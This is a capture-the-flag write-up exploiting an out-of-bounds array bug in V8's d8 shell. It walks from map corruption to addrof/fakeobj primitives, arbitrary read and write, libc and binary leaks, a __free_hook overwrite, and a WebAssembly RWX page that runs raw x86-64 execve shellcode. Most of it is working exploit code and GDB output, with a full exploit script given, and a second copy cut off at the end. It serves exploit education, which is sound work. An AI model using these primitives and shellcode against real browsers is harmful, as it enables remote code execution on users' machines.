We're going to throw this into a javascript file exploit.js. If we want to use these functions, we can simply pass them to d8 in the command line:

./d8 --shell ./exploit.js

Maps

The Map is an incredibly important V8 data structure, storing key information such as

The dynamic type of the object (e.g. String, Uint8Array, etc)
The size of the object in bytes
The properties of the object and where they are stored
The type of the array elements (e.g. unboxed doubles, tagged pointers, etc)

Each javascript object is linked to a map. While the property names are usually stored in the map, the values are stored with the object itself. This allows objects with the same sort of structure to share maps, increasing efficiency.

There are three different regions that property values can be stored

Inside the object itself (inline properties)
In a separate dynamically-sized heap buffer (out-of-line properties)
If the property name is an integer index, then as array elements in a dynamically-sized heap array
- to be honest, not entirely sure that this means, but I'll get it eventually

In the first two cases, the Map stores each property of the object with a linked slot number. Each object then contains all of the property values, matching with the slot number of the relevant property. The object does not store the name of the property, only the slot number.

I promise this makes sense - for example, let's take two array objects:

var object1 = {a: 20, b: 40};
var object2 = {a: 30, b: 60};

Once this is run, memory will contain two JSObject instances and one Map:

We can see that the Map stores the properties a and b, giving them the slot values 0 and 1 respectively. The two objects object1 and object2, because of their identical structure, both use Map1 as a map. The objects do not themselves know the name of the properties, only the slot values, which they assign a value to.

However, if we add another property - say c, with value 60 - to object1, they stop sharing the map:

If we then added a property c to object2, they would then share Map1 again! This works assigning each map something called a transition table, which is just a note of which map to transition to if a property of a certain name (and possibly type) are added to it. In the example above, Map2 would make a note that if a property c is added to object2 then it should transition to use Map1.

Let's see how this works out in memory for arrays using the debug version of d8, along with the incredibly helpful %DebugPrint() feature that comes along with it. We'll run it under gdb so we can analyse memory as well, and make connections between all the parts.

What exists after the end of an Array?

Instead of creating our own objects, let's focus specifically on how it works for arrays, as that is what we are dealing with here.

$ gdb d8 
gef➤  run --allow-natives-syntax
V8 version 7.5.0 (candidate)
d8> a = [1.5, 2.5]
[1.5, 2.5]
d8> %DebugPrint(a)
DebugPrint: 0x30b708b4dd71: [JSArray]
 - map: 0x09bccc0c2ed9 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
 - prototype: 0x2358a3991111 <JSArray[0]>
 - elements: 0x30b708b4dd51 <FixedDoubleArray[2]> [PACKED_DOUBLE_ELEMENTS]
 - length: 2
 - properties: 0x3659bdb00c71 <FixedArray[0]> {
    #length: 0x0418bc0c01a9 <AccessorInfo> (const accessor descriptor)
 }
 - elements: 0x30b708b4dd51 <FixedDoubleArray[2]> {
           0: 1.5
           1: 2.5
 }
0x9bccc0c2ed9: [Map]
 - type: JS_ARRAY_TYPE
 - instance size: 32
 - inobject properties: 0
 - elements kind: PACKED_DOUBLE_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - back pointer: 0x09bccc0c2e89 <Map(HOLEY_SMI_ELEMENTS)>
 - prototype_validity cell: 0x0418bc0c0609 <Cell value= 1>
 - instance descriptors #1: 0x2358a3991f49 <DescriptorArray[1]>
 - layout descriptor: (nil)
 - transitions #1: 0x2358a3991eb9 <TransitionArray[4]>Transition array #1:
     0x3659bdb04ba1 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_DOUBLE_ELEMENTS) -> 0x09bccc0c2f29 <Map(HOLEY_DOUBLE_ELEMENTS)>

 - prototype: 0x2358a3991111 <JSArray[0]>
 - constructor: 0x2358a3990ec1 <JSFunction Array (sfi = 0x418bc0caca1)>
 - dependent code: 0x3659bdb002c1 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>
 - construction counter: 0

[1.5, 2.5]
d8>

That is a lot of information. Let's sift through the relevant parts.

Firstly, we notice that a is a type JSArray, stored in memory at 0x30b708b4dd70. The array's map is stored at 0x09bccc0c2ed8, with the properties (in this case length) stored at 0x3659bdb00c70. The elements themselves are in a FixedDoubleArray stored at 0x30b708b4dd50.

Remember pointer tagging! All the addresses are represented as addr | 1, so we have to subtract off 1 for every pointer to get the real location!

Let's view memory itself. Hit Ctrl-C and you'll go to the gef prompt. Let's view the memory at the location of the JSArray object itself, 0x30b708b4dd70.

gef➤  x/4gx 0x30b708b4dd70
0x30b708b4dd70:	0x000009bccc0c2ed9	0x00003659bdb00c71
0x30b708b4dd80:	0x000030b708b4dd51	0x0000000200000000

So the JSArray first has its pointer to its own map, then a pointer to its properties, then a pointer to its elements and then its length (note that length will be an smi, so a length of 2 is actually represented in memory as 2<<32!).

One thing that is very curious is that the the elements array is actually located 0x20 bytes ahead of memory from the JSArray object itself. Interesting! Let's view it:

gef➤  x/10gx 0x000030b708b4dd50
0x30b708b4dd50:	0x00003659bdb014f9	0x0000000200000000  <- elements (map, length)
0x30b708b4dd60:	0x3ff8000000000000	0x4004000000000000  <- array entries
0x30b708b4dd70:	0x000009bccc0c2ed9	0x00003659bdb00c71  <- JSArray
0x30b708b4dd80:	0x000030b708b4dd51	0x0000000200000000
0x30b708b4dd90:	0x00003659bdb01cc9	0x0000000400000000

Note that elements itself is a FixedDoubleArray, so the first value will be a pointer to its map at 0x00003659bdb014f8; this map doesn't concern us right now. The next value is the length of the FixedDoubleArray, the smi of 0x2 again. After this, it gets interesting.

As expected, the next two entries are the doubles representing 1.5 and 2.5, the entries in the array:

gef➤  p/f 0x3ff8000000000000
$1 = 1.5
gef➤  p/f 0x4004000000000000
$2 = 2.5

But immediately after in memory is the original JSArray. So? Well, if we have an OOB read/write to an extra index past the array, the value we are accessing is the pointer in the JSArray that points to the map. We can write to and read the map of the array.

Just to confirm this is correct, we're going to run the release version of d8 and check the output of .oob(). The reason we have to use release is that the debug version has a lot more safety and OOB checks (I assume for fuzzing purposes) so will just break if we try to use a.oob(). We need to run it with --shell exploit.js, and you'll see why in a second.

$ gdb d8 
gef➤  run --allow-natives-syntax --shell exploit.js
V8 version 7.5.0 (candidate)
d8> a = [1.5, 2.5]
[1.5, 2.5]
d8> a.oob()
2.28382032514e-310

Now we need to use our ftoi() function to convert it to a hexadecimal integer:

d8> ftoi(a.oob()).toString(16)
"2a0a9af82ed9"

Note that ftoi() only exists because of the --shell, which is why we needed it.

If our reasoning is correct, this is a pointer to the map, which is located at 0x2a0a9af82ed9. Let's compare with GDB tells us:

d8> %DebugPrint(a)
0x2d83ee78e0b9 <JSArray[2]>
[1.5, 2.5]
d8> ^C
gef➤  x/4gx 0x2d83ee78e0b8
0x2d83ee78e0b8:	0x00002a0a9af82ed9	0x00000db811140c71
0x2d83ee78e0c8:	0x00002d83ee78e099	0x0000000200000000

The first value at the location of the JSArray is, as we saw earlier, the pointer to the map. Not only that, but we successfully read it! Look - it's 0x2a0a9af82ed9 again!

Now we know we can read and write to the map that the array uses. How do we go from here?

Abusing Map Control

Values vs Pointers

The important thing to note is that sometimes a program will store values (pass by value), and sometimes it will store a pointer to a value (pass by reference). We can abuse this functionality, because an array of doubles will store the double values themselves while an array of objects will store pointers to the objects.

This means there is an extra link in the chain - if we do array[2] on an array of doubles, V8 will go to the address in memory, read the value there, and return it. If we do array[2] on an array of objects, V8 will go to the address in memory, read the value there, go to that address in memory, and return the object placed there.

We can see this behaviour by defining two arrays, one of doubles and one of custom objects:

var float_arr = [1.5, 2.5]
var obj1 = {a: 1, b: 2}
var obj2 = {a: 5, b: 10}
var obj_arr = [obj1, obj2]

gef➤  run --allow-natives-syntax --shell exploit.js
V8 version 7.5.0 (candidate)
d8> var float_arr = [1.5, 2.5] 
undefined
d8> var obj1 = {a: 1, b: 2}
undefined
d8> var obj2 = {a: 5, b: 10}
undefined
d8> var obj_arr = [obj1, obj2]
undefined
d8> %DebugPrint(float_arr)
0x3a38af88e0c9 <JSArray[2]>
[1.5, 2.5]
d8> %DebugPrint(obj_arr)
0x3a38af8915f1 <JSArray[2]>
[{a: 1, b: 2}, {a: 5, b: 10}]

Break out to gef and see the elements of both arrays.

float_arr:

gef➤  x/4gx 0x3a38af88e0c8
0x3a38af88e0c8:	0x0000179681882ed9	0x0000389170c80c71
0x3a38af88e0d8:	0x00003a38af88e0a9	0x0000000200000000
gef➤  x/4gx 0x00003a38af88e0a8    <-- access elements array
0x3a38af88e0a8:	0x0000389170c814f9	0x0000000200000000
0x3a38af88e0b8:	0x3ff8000000000000	0x4004000000000000

Again, 1.5 and 2.5 in floating-point form.

obj_arr:

gef➤  x/4gx 0x3a38af8915f0
0x3a38af8915f0:	0x0000179681882f79	0x0000389170c80c71
0x3a38af891600:	0x00003a38af8915d1	0x0000000200000000
gef➤  x/4gx 0x00003a38af8915d0    <-- access elements array
0x3a38af8915d0:	0x0000389170c80801	0x0000000200000000
0x3a38af8915e0:	0x00003a38af8904f1	0x00003a38af8906b1

Note that the elements array in the second case has values 0x3a38af8904f1 and 0x3a38af8906b1. If our suspicions are correct, they would be pointers to the objects obj1 and obj2. Do c to continue the d8 instance, and print out the debug for the objects:

d8> %DebugPrint(obj1)
0x3a38af8904f1 <Object map = 0x17968188ab89>
{a: 1, b: 2}
d8> %DebugPrint(obj2)
0x3a38af8906b1 <Object map = 0x17968188ab89>
{a: 5, b: 10}

And look - so beautifully aligned!

Leaking Object Addresses

What happens if we overwrite the map of an object array with the map of a float array? Logic dictates that it would treat it as a double rather than a pointer, resulting in a leak of the location of obj1! Let's try it.

d8> var map_float = float_arr.oob()
d8> obj_arr.oob(map_float)
d8> ftoi(obj_arr[0]).toString(16)
"3a38af8904f1"

We leak 0x3a38af8904f1 - which is indeed the location of obj1! We therefore can leak the location of objects. We call this an addrof primitive, and we can add another function to our exploit.js to simplify it:

var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();

var initial_obj = {a:1};	// placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();

function addrof(obj) {
    obj_arr[0] = obj;			// put desired obj for address leak into index 0
    obj_arr.oob(map_float);		// change to float map
    let leak = obj_arr[0];		// read address
    obj_arr.oob(map_obj);		// change back to object map, to prevent issues down the line
    return ftoi(leak);			// return leak as an integer
}

Really importantly, the reason we can set map_obj and get the map is because obj_arr.oob() will return the value as a double, which we noted before! If it returned that object itself, the program would crash. You can see this in my Download Horsepower writeup.

We can load it up in d8 ourselves and compare the results:

$ gdb d8 
gef➤  run --allow-natives-syntax --shell exploit.js
V8 version 7.5.0 (candidate)
d8> obj = {a:1}
{a: 1}
d8> %DebugPrint(obj)
0x031afef4ebe9 <Object map = 0x3658c164ab39>
{a: 1}
d8> addrof(obj).toString(16)
"31afef4ebe9"

Perfect, it corresponds exactly!

Creating Fake Objects

The opposite of the addrof primitive is called a fakeobj primitive, and it works in the exact opposite way - we place a memory address at an index in the float array, and then change the map to that of the object array.

function fakeobj(addr) {
    float_arr[0] = itof(addr);  // placed desired address into index 0
    float_arr.oob(map_obj);     // change to object map
    let fake = float_arr[0];    // get fake object
    float_arr.oob(map_float);   // swap map back
    return fake;                // return object
}

Arbitrary Reads

From here, an arbitrary read is relatively simple. It's important to remember that whatever fakeobj() returns is an object, not a read! So if the data there does not form a valid object, it's useless.

The trick here is to create a float array, and then make the first index a pointer to a map for the float array. We are essentially faking an array object inside the actual array. Once we call fakeobj() here, we have a valid, faked array.

But why does this help? Remember that the third memory address in a JSArray object is an elements pointer, which is a pointer to the list of values actually being stored. We can modify the elements pointer by accessing index 2 of the real array, faking the elements pointer to point to a location of our choice. Accessing index 0 of the fake array will then read from the fake pointer!

[TODO image, but not sure what exactly would help]

Because we need an index 2, we're going to make the array of size 4, as 16-byte alignment is typically nice and reduces the probability of things randomly breaking.

// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));

Now we want to start an arb_read() function. We can begin by tagging the pointer, and then placing a fakeobj at the address of the arb_rw_arr:

function arb_read(addr) {
    // tag pointer
    if (addr % 2n == 0)
        addr += 1n;

    // place a fake object over the elements FixedDoubleArray of the valid array
    let fake = fakeobj(addrof(arb_rw_arr));
}

HOWEVER - this is not quite right! We want fake to point at the first element of the FixedDoubleArray elements, so we need an offset of 0x20 bytes back (doubles are 8 bytes of space each, and we know from before that elements is just ahead of the JSArray itself in memory), so it looks like this:

function arb_read(addr) {
    // tag pointer
    if (addr % 2n == 0)
        addr += 1n;

    // place a fake object over the elements FixedDoubleArray of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20 
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
}

Now we want to access arb_rw_arr[2] to overwrite the fake elements pointer in the fake array. We want to set this to the desired RW address addr, but again we need an offset! This time it's 0x10 bytes, because the first index is 0x10 bytes from the start of the object as the first 8 bytes are a map and the second 8 are the length smi:

// overwrite `elements` field of fake array with address
// we must subtract 0x10 as there are two 64-bit values
// initially with the map and a size smi, so 0x10 offset
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);

And finally we return the leak. Putting it all together:

// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));

function arb_read(addr) {
    // tag pointer
    if (addr % 2n == 0)
        addr += 1n;

    // place a fake object over the elements FixedDoubleArray of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20 
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);

    // overwrite `elements` field of fake array with address
    // we must subtract 0x10 as there are two 64-bit values
    // initially with the map and a size smi, so 0x10 offset
    arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);

    // index 0 will returns the arbitrary read value
    return ftoi(fake[0]);
}

Arbitrary Writes

Initial Fail

Logic would dictate that we could equally get an arbitrary write using the same principle, by simply setting the value instead of returning it. Unfortunately, not quite - if we look at Faith's original writeup, the initial_arb_write() function fails:

function initial_arb_write(addr, val) {
    // place a fake object and change elements, as before
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);

    // Write to index 0
    fake[0] = itof(BigInt(val));
}

Note that we're not explicitly accounting for pointer tagging here. This is not because it's not important, but because the way we've set up addrof and fakeobj preserves the tagging, and since we're working with static offsets of multiples of 0x10 the tag is preserved. If we tried to explicitly write to a location, we would have to tag it. If we wanted to be very thorough, we would put pointer tagging explicitly in all functions.

In the blog post they tell us they're not sure why, and goes on to explain the intended method with ArrayBuffer backing pointers. In a short twitter conversation we had they tell us that

The arbitrary write doesn't work with certain addresses due to the use of floats. The overwrite had precision loss with certain addresses, but this wasn't the case with ArrayBuffer backing pointers. The code handles that differently compared to the elements ptr.

I can confirm that running the initial_arb_write() does, in fact, crash with a SIGSEGV. If anybody finds a fix, I'm sure they would be very interested (and I would too).

ArrayBuffer Backing Pointers

An ArrayBuffer is simply used to represent a generic raw binary data buffer. We combine this with the DataView object to provide a low-level interface for reading and writing multiple number types. These number types includes the ever-useful setInt64(), which is where our reliability for handling the integers probably comes from.

The backing store of an ArrayBuffer is much like the elements of a JSArray, in that it points to the address of the object that actually stores the information. It's placed 0x20 bytes ahead of the ArrayBuffer in memory (which you can check with GDB).

We will have to use the initial_arb_write() to perform this singular write, and hope that the address precision is good enough (if not, we just run it again).

function arb_write(addr, val) {
    // set up ArrayBuffer and DataView objects
    let buf = new ArrayBuffer(8);
    let dataview = new DataView(buf);
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x20n;

    // write address to backing store
    initial_arb_write(backing_store_addr, addr);
    // write data to offset 0, with little endian true
    dataview.setBigUint64(0, BigInt(val), true);
}

Getting RCE

From here, it's similar to userland exploitation.

Overwriting __free_hook() with system()

The simplest approach, as any call to console.log() will inevitably be freed immediately after. To do this, we'll need a libc leak.

In order for it to be reliable, it'll have to be through a section of memory allocated by V8 itself. We can use GDB to comb throught the memory of the area that stored the maps. I'm going to get exploit.js to print out a bunch of the addresses we have. I'll then try and retrieve every single notable address I can.

console.log("[+] Float Map: 0x" + ftoi(map_float).toString(16))
console.log("[+] Object Map: 0x" + ftoi(map_obj).toString(16))

Running it multiple times, the last 4 digits are consistent, implying that they're a fixed offset:

[+] Float Map: 0x2b1dc2e82ed9
[+] Object Map: 0x2b1dc2e82f79

That bodes well. Running vmmap, we can find the region they are in:

gef➤  vmmap
[...]
0x00002b1dc2e80000 0x00002b1dc2ec0000 0x0000000000000000 rw-
[...]

So the offsets appear to be 0x2ed9 and 0x2f79. Let's throw that into exploit.js and see if that's right by running it again and again. It appears to be, but randomly there is an issue and the address is not even in assigned memory - I assume it's at least in part due to the floating-point issues.

Now we have that, let's try combing through the map region and see if there are any other interesting values at fixed offsets.

$ gdb ./d8 
gef➤  run --allow-natives-syntax --shell exploit.js
[+] Address of Arbitrary RW Array: 0x64d2a00f499
[+] Float Map: 0x1d8734482ed9
[+] Object Map: 0x1d8734482f79
[+] Map Region Start: 0x1d8734480000
V8 version 7.5.0 (candidate)
d8> ^C
gef➤  vmmap
[...]
0x00001d8734480000 0x00001d87344c0000 0x0000000000000000 rw- 
[...]
0x0000555555554000 0x00005555557e7000 0x0000000000000000 r-- /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555557e7000 0x00005555562af000 0x0000000000293000 r-x /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555562af000 0x00005555562ef000 0x0000000000d5b000 r-- /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555562ef000 0x00005555562f9000 0x0000000000d9b000 rw- /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555562f9000 0x00005555563c6000 0x0000000000000000 rw- [heap]
[...]
0x00007ffff7005000 0x00007ffff71ec000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff71ec000 0x00007ffff73ec000 0x00000000001e7000 --- /lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff73ec000 0x00007ffff73f0000 0x00000000001e7000 r-- /lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff73f0000 0x00007ffff73f2000 0x00000000001eb000 rw- /lib/x86_64-linux-gnu/libc-2.27.so
[...]
gef➤  x/200gx 0x1d8734480000
0x1d8734480000:	0x0000000000040000	0x0000000000000004
0x1d8734480010:	0x00005555563a7f60	0x000055555631a2e0
0x1d8734480020:	0x00001d8734480000	0x0000000000040000
0x1d8734480030:	0x0000555556329b60	0x00001d8734480001
0x1d8734480040:	0x0000555556394e90	0x00001d8734480138
0x1d8734480050:	0x00001d87344c0000	0x0000000000000000
0x1d8734480060:	0x0000000000000000	0x0000000000000000
[...]

We can see that, very close to the start of the region, there appear to be two heap addresses (and more later). This makes sense, as many maps will point to areas of the heap as the heap stores dynamically-sized data.

That seems more useful than what we have right now, so let's grab that and see if the offset is constant. Right now, the offsets are 0xaef60 and 0x212e0. They appear to be constant. Let's throw those leaks in too.

let heap_leak = arb_read(map_reg_start + 0x10n);
let heap_base = heap_leak - 0xaef60n;
console.log("[+] Heap Base: 0x" + heap_base.toString(16))

It all seems to be pretty good, but a heap leak itself is not the most helpful. Let's keep digging, but looking at the heap this time, as that is probably more likely to store libc or binary addresses.

gef➤  x/200gx 0x5555562f9000
0x5555562f9000 <_ZN2v85Shell15local_counters_E+2400>:	0x0000000000000000	0x0000000000000000
0x5555562f9010 <_ZN2v85Shell15local_counters_E+2416>:	0x0000000000000000	0x0000000000000000
0x5555562f9020 <_ZN2v85Shell15local_counters_E+2432>:	0x0000000000000000	0x0000000000000000
[...]

Ok, pretty useless. What about if we actually use the heap addresses we have, and see if there's anything useful there? The first one has nothing useful, but the second:

gef➤  x/10gx 0x000055555631a2e0
0x55555631a2e0:	0x00005555562dbea8	0x0000000000001000
0x55555631a2f0:	0x0000000000001000	0x0000000000000021
[...]

The vmmap output for this specific run shows a binary base of 0x555555554000 and a heap base of 0x5555562f9000. This makes the first address a binary address! Let's make sure it's a consistent offset from the base, and we're also gonna swap out our exploit to use the second heap address we spotted in the map region. And it is!

let heap_leak = arb_read(map_reg_start + 0x18n);
let heap_base = heap_leak - 0x212e0n;
console.log("[+] Heap Base: 0x" + heap_base.toString(16));

let binary_leak = arb_read(heap_leak);
let binary_base = binary_leak - 0xd87ea8n;
console.log("[+] Binary Base: 0x" + binary_base.toString(16));

Now we just have to work out the GOT offset and read the entry to find libc base!

readelf -a d8 | grep -i read
[...]
000000d9a4c0  003d00000007 R_X86_64_JUMP_SLO 0000000000000000 read@GLIBC_2.2.5 + 0
[...]

So the GOT entry is an offset of 0xd9a4c0 from base. Easy leak:

let read_got = binary_base + 0xd9a4c0n;
console.log("[+] read@got: 0x" + read_got.toString(16));
let read_libc = arb_read(read_got);
console.log("[+] read@libc: 0x" + read_libc.toString(16));
let libc_base = read_libc - 0xbc0430n;
console.log("[+] LIBC Base: 0x" + libc_base.toString(16));

Then we just need to get system and free_hook offsets, and we are good to go. Pretty easy from inside GDB:

gef➤  p &system
$1 = (int (*)(const char *)) 0x7ffff7054420 <__libc_system>
gef➤  p &__free_hook
$2 = (void (**)(void *, const void *)) 0x7ffff73f28e8 <__free_hook>

With base 0x7ffff7005000, the offsets are easy to calculate:

// system and free hook offsets
let system = libc_base + 0x4f420n;
let free_hook = libc_base + 0x3ed8e8n;

And we can overwrite free hook and pop a calculator:

console.log("[+] Exploiting...");
arb_write(free_hook, system);
console.log("xcalc");

It does, in fact, work!

Full Exploit

// conversion functions
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val) { // typeof(val) = float
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

// others
var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();

var initial_obj = {a:1};	// placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();

function addrof(obj) {
    obj_arr[0] = obj;			// put desired obj for address leak into index 0
    obj_arr.oob(map_float);		// change to float map
    let leak = obj_arr[0];		// read address
    obj_arr.oob(map_obj);		// change back to object map, to prevent issues down the line
    return ftoi(leak);			// return leak as an integer
}

function fakeobj(addr) {
    float_arr[0] = itof(addr);  // placed desired address into index 0
    float_arr.oob(map_obj);     // change to object map
    let fake = float_arr[0];    // get fake object
    float_arr.oob(map_float);   // swap map back
    return fake;                // return object
}

// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));

function arb_read(addr) {
    // tag pointer
    if (addr % 2n == 0)
        addr += 1n;

    // place a fake object over the elements FixedDoubleArray of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20 
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);

    // overwrite `elements` field of fake array with address
    // we must subtract 0x10 as there are two 64-bit values
    // initially with the map and a size smi, so 0x10 offset
    arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);

    // index 0 will returns the arbitrary read value
    return ftoi(fake[0]);
}

function initial_arb_write(addr, val) {
    // place a fake object and change elements, as before
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);

    // Write to index 0
    fake[0] = itof(BigInt(val));
}

function arb_write(addr, val) {
    // set up ArrayBuffer and DataView objects
    let buf = new ArrayBuffer(8);
    let dataview = new DataView(buf);
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x20n;

    // write to address to backing store
    initial_arb_write(backing_store_addr, addr);
    // write data to offset 0, with little endian true
    dataview.setBigUint64(0, BigInt(val), true);
}

// exploit
// leaks
console.log("[+] Float Map: 0x" + ftoi(map_float).toString(16));
console.log("[+] Object Map: 0x" + ftoi(map_obj).toString(16));

let map_reg_start = ftoi(map_float) - 0x2ed9n;
console.log("[+] Map Region Start: 0x" + map_reg_start.toString(16));

let heap_leak = arb_read(map_reg_start + 0x18n);
let heap_base = heap_leak - 0x212e0n;
console.log("[+] Heap Base: 0x" + heap_base.toString(16));

let binary_leak = arb_read(heap_leak);
let binary_base = binary_leak - 0xd87ea8n;
console.log("[+] Binary Base: 0x" + binary_base.toString(16));

let read_got = binary_base + 0xd9a4c0n;
console.log("[+] read@got: 0x" + read_got.toString(16));
let read_libc = arb_read(read_got);
console.log("[+] read@libc: 0x" + read_libc.toString(16));
let libc_base = read_libc - 0xbc0430n;
console.log("[+] LIBC Base: 0x" + libc_base.toString(16));

// system and free hook offsets
let system = libc_base + 0x4f420n;
let free_hook = libc_base + 0x3ed8e8n;

console.log("[+] Exploiting...");
arb_write(free_hook, system);
console.log("xcalc");

Unfortunately, as Faith recognised in their article, when running the exploit on the Chrome binary itself (the actual browser provided with the challenge!) the __free_hook route does not work. It's likely due to a different memory layout as a result of different processes running, so the leaks are not the same and the offsets are broken. Debugging would be nice, but it's very hard with the given binary. Instead we can use another classic approach and abuse WebAssembly to create a RWX page for our shellcode.

Abusing WebAssembly

This approach is even better because it will (theoretically) work on any operating system, not be reliant on the presence of libc and __free_hook as it allows us to run our own shellcode. I'm gonna save this in exploit2.js.

If we create a function in WebAssembly, it will create a RWX page that we can leak. The WASM code itself is not important, we only care about the RWX page. To that effect I'll use the WASM used by Faith, because the website wasmfiddle has been closed down and I cannot for the life of me find an alternative. Let me know if you do.

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

We can see that this creates an RWX page:

gef➤  vmmap
[...]
0x000035d2131ff000 0x000035d21b141000 0x0000000000000000 --- 
0x0000396a8d0b5000 0x0000396a8d0b6000 0x0000000000000000 rwx 
0x0000396a8d0b6000 0x0000396acd0b5000 0x0000000000000000 ---
[...]

If we leak the addresses of wasm_mod, wasm_instance and f, none of them are actually located in the RWX page, so we can't simply addrof() and apply a constant offest. Instead, we're gonna comb memory for all references to the RWX page. The WASM objects likely need a reference to it of sorts, so it's possible a pointer is stored near in memory.

console.log("[+] WASM Mod at 0x" + addrof(wasm_mod).toString(16));
console.log("[+] WASM Instance at 0x" + addrof(wasm_instance).toString(16));
console.log("[+] F at 0x" + addrof(f).toString(16));

gef➤  run --allow-natives-syntax --shell exploit2.js
[+] Address of Arbitrary RW Array: 0x22322b10f919
[+] WASM Mod at 0x22322b10fcc9
[+] WASM Instance at 0x45c390e13a1
[+] F at 0x45c390e1599
V8 version 7.5.0 (candidate)
d8> ^C
gef➤  vmmap
[...]
0x0000311254159000 0x000031125415a000 0x0000000000000000 rwx
[...]
gef➤  search-pattern 0x0000311254159000
[+] Searching '\x00\x90\x15\x54\x12\x31\x00\x00' in memory
[+] In (0x45c390c0000-0x45c39100000), permission=rw-
  0x45c390e1428 - 0x45c390e1448  →   "\x00\x90\x15\x54\x12\x31\x00\x00[...]" 
[+] In '[heap]'(0x5555562f9000-0x5555563c6000), permission=rw-
  0x5555563a1e38 - 0x5555563a1e58  →   "\x00\x90\x15\x54\x12\x31\x00\x00[...]" 
  0x5555563acfe0 - 0x5555563ad000  →   "\x00\x90\x15\x54\x12\x31\x00\x00[...]" 
  0x5555563ad000 - 0x5555563ad020  →   "\x00\x90\x15\x54\x12\x31\x00\x00[...]" 
  0x5555563ad120 - 0x5555563ad140  →   "\x00\x90\x15\x54\x12\x31\x00\x00[...]"

The last four are in the heap, so unlikely, but the first instance is near to the wasm_instance and f. The offset between wasm_instance and that offset appears to be 0x87. In reality it is 0x88 (remember pointer tagging!), but that works for us.

let rwx_pointer_loc = addrof(wasm_instance) + 0x87n;
let rwx_base = arb_read(rwx_pointer_loc);
console.log("[+] RWX Region located at 0x" + rwx_base.toString(16));

It spits out the right base, which is great. Now we just want to get shellcode for popping calculator as well as a method for copying the shellcode there. I'm gonna just (once again) shamelessly nab Faith's implementations for that, which are fairly self-explanatory.

function copy_shellcode(addr, shellcode) {
    // create a buffer of 0x100 bytes
    let buf = new ArrayBuffer(0x100);
    let dataview = new DataView(buf);
    
    // overwrite the backing store so the 0x100 bytes can be written to where we want
    // this is similar to the arb_write() function
    // but we have to redo it because we want to write way more than 8 bytes
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x20n;
    initial_arb_write(backing_store_addr, addr);

    // write the shellcode 4 bytes at a time
    for (let i = 0; i < shellcode.length; i++) {
	dataview.setUint32(4*i, shellcode[i], true);
    }
}

// https://xz.aliyun.com/t/5003
var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];

And then we just copy it over and pop a calculator:

console.log("[+] Copying Shellcode...");

copy_shellcode(rwx_base, shellcode);

console.log("[+] Running Shellcode...");

f();

Running this under GDB causes it to crash for me, but running it in bash works fine:

$ ./d8 --shell exploit2.js 
[+] Address of Arbitrary RW Array: 0x19b85504fea1
[+] WASM Instance at 0x189e40ca1761
[+] RWX Region located at 0x29686af10000
[+] Copying Shellcode...
[+] Running Shellcode...
Warning: Cannot convert string "-adobe-symbol-*-*-*-*-*-120-*-*-*-*-*-*" to type FontStruct

With a calculator popped!

Full Exploit

// conversion functions
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
